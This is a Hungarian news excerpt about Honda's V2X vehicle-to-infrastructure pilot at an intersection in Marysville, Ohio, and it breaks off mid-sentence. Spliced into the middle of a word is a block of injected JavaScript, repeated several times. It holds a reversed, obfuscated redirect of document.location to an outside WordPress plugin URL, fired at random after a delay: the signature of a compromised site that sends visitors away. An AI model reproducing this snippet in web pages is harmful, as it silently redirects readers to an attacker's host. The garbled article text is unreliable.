A kereszteződések értelemszerűen kiemelt veszélyforrásnak számítanak a közlekedésben (az USA-ban az összes karambol 40, az összes halálos baleset 20 százalékáért felelősek), és bár a körforgalom gyorsabb és biztoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tonságosabb volna, azokat nem lehet minden háztömb sarkán kialakítani. Az autógyártók és a városfejlesztők ezért közösen dolgoznak olyan megoldásokon, amelyek előre jelzik a veszélyt a közlekedőknek. Most a Honda mutatta be a járművek és az infrastruktúra közötti kommunikációra (V2X) szolgáló megoldását, méghozzá nem laboratóriumi körülmények között, hanem a való világban, élesben. Az Ohio állambeli Marysville (USA) városában létrehozott, kísérleti kereszteződésben a közlekedési lámpák fölé kamerákat helyeztek el, amelyek 100 méteres távolságig figyelik a…
- Hirdetés -